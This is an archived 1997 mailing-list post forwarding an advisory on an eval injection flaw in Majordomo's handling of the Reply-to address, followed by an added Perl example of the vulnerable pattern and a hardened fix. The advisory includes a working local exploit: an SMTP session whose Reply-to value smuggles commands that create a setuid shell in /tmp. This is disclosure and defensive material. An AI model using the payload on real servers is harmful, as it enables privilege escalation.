Great Circle Associates Majordomo-Workers
(August 1997)

Subject: [Fwd: BoS: Vulnerability in Majordomo]
From: Brian Behlendorf <brian @ organic . com>
Date: Mon, 25 Aug 1997 13:01:33 -0700
To: majordomo-workers @ greatcircle . com


Hmm - has everyone else seen this?  Is there a patch available for it?

	Brian

>Date: Sun, 24 Aug 1997 15:17:18 +0300 (EET DST)
>From: Razvan Dragomirescu <drazvan@kappa.ro>
>Message-ID: <Pine.LNX.3.96.970824150942.13326A-100000@pop3.kappa.ro>
>To: best-of-security@cyber.com.au
>Resent-From: best-of-security@cyber.com.au
>Subject: BoS: Vulnerability in Majordomo
>
>
>Hello all,
>
>I have discovered a vulnerability in "majordomo" that allows local and
>remote users to execute commands with the rights of the user running the
>server. This user is usually in the daemon group, so this can be quite
>harmful.
>
>Still, there is a condition for the exploit to work. The server should
>have at least one list that uses the "advertise" or "noadvertise"
>directives in the configuration files. These directives indicate if the
>list should (or should not) be included in a reply to a "LISTS" command
>depending on the address the request came from. The exploit also works if
>the server has one or more "hidden" lists (see the Majordomo documentation
>for details).
>
>Here's a piece of the configuration file:
>
>-- lrazvan.config --
>
>        # advertise            [regexp_array] (undef) <majordomo>
>        # If the requestor email address matches one of these regexps, then
>        # the list will be listed in the output of a lists command. Failure
>        # to match any regexp excludes the list from the output. The
>        # regexps under noadvertise override these regexps.
>advertise           <<  END
>/.*/
>END
>-- end lrazvan.config --
>
>The one above tells majordomo to include this list in any "LISTS" request.
>
>The problem is that when the server finds a list that has one of these
>attributes ("advertise" or "noadvertise"), it will try to match the
>reply-to address against these patterns. It uses an "eval" command to do
>this.
>
>Let's take a look at the PERL source (the do_lists procedure):
>
>-- majordomo --
>foreach $i (@array) {
>                      $command = "(q~$reply_addr~ =~ $i)";
>                      $result = 1, last if (eval $command);
>                   }
>
>-- end majordomo --
>
>$reply_addr is the result of some paranoid validation. It cannot contain
><,>,[,],-,+,(,),; etc..
>But with a few tricks, this won't be a problem :).
>
>Now, for the exploits. There are two of them, one for the local users who
>just want a setuid shell (with the rights of the server owner, usually
>majordomo.daemon), and one for the remote users who might want to copy
>some files or execute commands remotely (the old "mail foo@foo.net <
>/etc/passwd" won't work, it contains '<' ...).
>
>Local exploit:
>--exploit--
>telnet localhost 25
>
>helo localhost
>mail from: user
>rcpt to: majordomo (or whatever the name of the majordomo user is)
>data
>From: user
>To: majordomo
>Reply-to:
>a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro
>
>LISTS
>
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
"Why not?" - TL           brian@organic.com - hyperreal.org - apache.org
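The root cause in the do_lists snippet quoted above is that the reply address is pasted into a string of Perl source and handed to `eval`, so the address is treated as code rather than data. The following Perl is an added example written for this archive page; it is not Majordomo's code and not the advisory author's. It places the vulnerable shape next to a hardened version that compiles each configured regexp once with `qr//` and then matches the address as a plain string. It assumes the config patterns take the `/.../` form shown in the advisory, with no trailing flags; the function names and the sample patterns are constructed for the example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Vulnerable shape (as in the advisory): the address becomes part of the
# source text that eval compiles, so any quoting character in it changes
# the program rather than the data.
sub lists_match_unsafe {
    my ($reply_addr, @patterns) = @_;
    foreach my $i (@patterns) {
        my $command = "(q~$reply_addr~ =~ $i)";
        return 1 if eval $command;
    }
    return 0;
}

# Hardened: turn each configured pattern into a compiled regexp object.
# The only eval here wraps qr// and exists to survive a malformed pattern
# in the list config; no request-controlled text is ever compiled.
sub compile_patterns {
    my @compiled;
    foreach my $p (@_) {
        # Assumed config syntax: a Perl regexp written as /body/ (no flags).
        my ($body) = $p =~ m{^/(.*)/\z};
        unless (defined $body) {
            warn "skipping malformed advertise pattern: $p\n";
            next;
        }
        my $re = eval { qr/$body/ };
        unless (defined $re) {
            warn "cannot compile advertise pattern $p: $@";
            next;
        }
        push @compiled, $re;
    }
    return @compiled;
}

# The address is matched as data; '~', backticks, etc. are ordinary characters.
sub lists_match_safe {
    my ($reply_addr, @compiled) = @_;
    foreach my $re (@compiled) {
        return 1 if $reply_addr =~ $re;
    }
    return 0;
}

# Constructed advertise patterns, as they might appear in a list config.
my @advertise = ( '/\@example\.org$/', '/^admin-/' );
my @compiled  = compile_patterns(@advertise);

# An ordinary address is matched against the patterns.
print "user\@example.org: ", lists_match_safe('user@example.org', @compiled), "\n";
# An address carrying Perl quoting characters is just a string of characters here.
print "a~q~b: ",           lists_match_safe('a~q~b', @compiled), "\n";
```

The design point is that the admin-controlled pattern and the request-controlled address must never share the same `eval`: compile the pattern once (failures there are configuration errors worth logging), then use the regexp object as a value. The `q~...~` trick has nothing to break out of when the address is only ever an operand of `=~`.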